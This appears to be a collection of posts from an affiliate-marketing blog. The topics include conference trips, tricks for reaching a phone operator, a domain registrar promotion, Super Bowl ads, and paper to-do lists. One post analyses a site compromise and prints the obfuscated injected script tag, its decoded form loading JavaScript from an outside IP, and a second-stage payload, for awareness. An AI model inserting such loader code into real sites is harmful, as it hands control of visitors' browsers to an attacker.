After reading all of the Dennis Yu drama going on right now, and mixing it with a bit of boredom, my employee decided to prank a friend in the industry… Enjoy!

P.S. I had to edit out a couple words for privacy issues.

Dennis Yu Prank

I will be heading out to ASE in NYC early tomorrow morning, should hit the big apple around 5pm or so.

I know a lot of people have contacted me about meetings and whatnot, but I’ve been really busy and haven’t been able to “schedule” everything with everyone ahead of time.  If you want to meet up either email me or give my cell a call!

See you all out there, hope your ready for a good time!

Before I formed my own company and started working for myself I was a system administrator at a medium sized credit card service company.  Not only did I do the system administration stuff, but I also dealt with a variety of phone things.  Since the company had customer service and collections they had IVR’s to deal with the customers calling in.  One of the things I learned was that there are a lot of different things that will trigger you to be sent to a live operator such as:

• Dialing 0 (zero).  If it doesn’t forward you, try hitting it multiple times…some systems are setup for the 20th time to forward you to the operator.
• Pressing certain other characters like * and # anywhere from 1-4 times.
• Saying operator.
• Saying complaint.  Sometimes this takes more than one time also.
• My personal favorite, cussing.  A LOT of different cuss words will forward you directly to a live operator.

These simple tactics have come in really handy for me since 95% of the time just hitting 0 or cussing will get me instantly forwarded to a live operator.  I HATE wasting time sitting on hold and I figured I’d share these little “tricks” with anyone who isn’t aware of them.

If you want to know the quickest route to an operator or just simply can’t figure out how to get to one at a certain company then check out GetHuman.  This site lists exact steps to get greeted by a human as fast as possible.  It has come in very handy for me when shouting a simple F#CK YOU into the phone doesn’t get me where I need to be!

Well I have finally decided to switch to namecheap from now on.  I have purchased hundreds if not thousands of domains from godaddy since they first sprouted up and regardless of using the notorious coupon codes to get discounts, it still doesn’t compare to namecheap.

The first reason I decided to switch is because I am sick of being charged an additional 10 bucks everytime I want whoisguard protection.

Second reason? Because I like using SSL with my sites and these guys give you a FREE ssl cert with EVERY purchase.

Not the longest post ever but figured if you don’t know about this it would be a nice thing to know!

One thing to note is that if you browse directly to namecheap.com and buy a domain I don’t think you get the free SSL cert.  If you go through this link you get the free whoisguard AND the free SSL cert.

So a friend came to me today with a problem he was having and wasn’t sure what to do about…

Almost EVERY page on his webserver was going to a blank white page, or a page that was NOT what was intended to be viewed.

After looking into things, I realized we may have some foul play on our hands!

So somehow, this line of code was being inserted into almost every page on his entire hosting account.

<script language=javascript><!--
document.write(unescape('%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78
HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl
6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E').replace(/Cl6|HY8|zAn|Sn|
rL|Vh|GX/g,""));--></script>

Hmmmmmmmmmmmmm…..

My first clue was that this is using the javascript function unescape, which decodes an encoded string of text.

If you take the code and run it through a URL encoder, we end up with this:

<script language=javascript><!--  document.write(unescape('<GXscrLrGXirLpt VhsrcrL=Sn/HY8/78HY8.GX1GX1Cl60.Cl61Cl67Cl65Cl6.24Vh9zAn/Cl6jquVheHY8rrLyCl6.jSns>GX</GXszAnczAnrHY8iprLtzAn>').replace(/Cl6|HY8
|zAn|Sn|rL|Vh|GX/g,""));  --></script>

Next you can see at the end they are using javascript’s replace method which does just what it says, replaces characters with other characters.  With this particular piece of code it is replacing Cl6, HY8, zAn, Sn, rL, Vh, and GX with nothing, essentially just removing the characters.

Once you remove those characters you end up with:

<script src=//78.110.175.249/jquery.js></script>

Doing a whois on that ip reveals:

person:         Alexander A Solovyov
address:        LIMT Group Ltd.
address:        Karpinskogo 97a
address:        Moscow
address:        111423
address:        Russian Federation
phone:          +7 342 2763167
e-mail:         abuse@limt.ru
e-mail:         info@surehost.ru
e-mail:         svr.band@gmail.com

Sooooo it looks as if Mr. Solovyov has been inserting this piece of code into my friends page.  Doing a simple google search for 78.110.175.249 or Alexander A Solovyov reveals that this guy enjoys doing this sort of thing.

Well if you go to 78.110.175.249/jquery.js you will see that it APPEARS to be a jquery file… HOWEVER…this is NOT what it is.

There is actually a hidden payload inside the jquery library he included which pulls in MORE escaped code from:

http://78.110.175.249/cp/?N

which looks like this:

_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('~/`/~%4A~%75@%73t %66!u#c%6B%20@%6F@f~f%2E%2E%2E!?%3Cd@i#%76 %73$%74@%79%6C$e=#%64%69s%70`l%61y!:`%6E#o%6Ee~%3E|\n`va#r# t@%3Dn~e%77 @%44a@t%65|(%312!3%37|0`1%3759!2#0`%30$0`%29;#d$%6F`%63u`%6D!e|n|%74.~c!%6F%6F%6B%69e%3D%22h%67f%74=%31;` |e|xpi%72%65s~%3D"%2B~t.%74%6F!G~%4D~%54@%53%74r$i#%6E$g!%28)~+#%22`; ~pa%74|%68=/@%22@%3B\n@%2F%2F$%3C%2F`d|%69v%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));

If we un-obfuscate this code we end up with:

//Just fuck off...<div style=display:none>
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>

Which simply says “Just fuck off…” and then sets a cookie.

This luckily was not doing anything malicious, but COULD in the future (or could have in the past).  He can change any of the code on his webserver to do whatever he wants…whenever he wants.

After digging a bit more, I realized that my friend was infected with a trojan on his personal computer, and the attacker had most likely obtained his webserver account login and accessed it that way.

I figured I would post this little “attack case study” to give anyone interested some insight on a simple attack.  The best way to learn how to prevent these things is to be aware of them.

If you have ever been “hacked” or had your system exploited, leave a comment and let me know what you did to fix the situation, I’m curious to hear if many others have fallen prey like my friend did!

The other day I saw a commercial that PETA submitted to NBC to be aired during the super bowl, however NBC declined the ad because of it’s sexual content.

After watching it I understood why…

Now I am most certainly a meat eater and do not support PETA in any way…but this is pretty good marketing in the works.

This ‘Veggie Love’ ad reminded me of the GoDaddy ads (yes thats plural) that were rejected airtime for the Super Bowl a couple years back.

Its pretty obvious that the most simple, animalistic content far out performs even the most sophisticated messages. I can only imagine the type of response that these companies got and are getting out of these ads!

Like always, I like to keep you all informed of the affiliate rap scene, so here you go!

First, check out Nickycakes’ post which sums up the recent rap battles really well.

I also noticed that ppc.bz has already posted the newest in this battle.

Check it out yo!

After a nice little gap of non-posting I am back for more! haha.

The main reason I haven’t been posting is simply that I have had so much stuff going on that frequently posting on my blog just kind of passed my mind.  I have been pursuing many different projects and opportunities and have spent a LOT of time testing out dozens and dozens of new companies to buy traffic from.  I have such a new view on different sources of traffic and how things work….its been great.  I have also learned many things in these ventures for virgin "untapped" traffic sources.

But all of that aside…which I will post about here in the near future…

I am REALLY posting to tell everyone a little "secret" weapon of mine.

I have been doing some testing on things in just my regular lifestyle to increase what I get done and keep me on top of things.  I want to stress to everyone the importance of keeping an ACTIVE WRITTEN to do list.  That’s right.  It has to be written with pen or pencil onto paper.  None of this keeping a to do list on the blackberry or iPhone…that just doesn’t cut it.

I am dead serious…

I have been testing this out for MANY months now and the only way I can keep track of things with my spontaneous lifestyle is to literally keep an index card in my pocket and constantly jot whatever needs to be done onto my card.  Every single time I finish a task I cross it off the list.  I think this is where it makes the real difference of having it written down.  Something about clicking the delete key makes finishing tasks seem like not as big of a deal as if you get to strike that sucker off the list of that piece of paper that you carry around and look at repeatedly throughout the day.  Its like a constant reminder that you are ACTUALLY getting things done.

If you really want to be a bad ass, at the end of every night (or right away when you wake up) you can transfer all your unfinished tasks to a new card.  Kind of put the impression of what needs to get done into your head before bed (or right at the start of the day).  Than you have a nice fresh idea of what needs to get done the rest of the day.

I know this seems like something extremely simple and it is very hard to believe a simple task like this could make such a big difference in your life, but try it.  It WILL be worth it!

If you do something similar to this, or decide to give it a try…please post about it, I would love to hear your opinions!

I gotta thank Justin Tsang over at CX Digital for this one.  I love all these internet marketing rap videos haha.

Just packing up to take off for Affiliate Summit East 2008 out in Boston.  I leave early morning and will be out in Boston around noon tomorrrow (Sunday).

Looking forward to meeting up with a lot of guys I’ve been working with the last 6 months or so.

If you’re going to be out in Boston get ahold of me.  Either IM me, email me, or call my cell (if you have my digits )

See you all out there!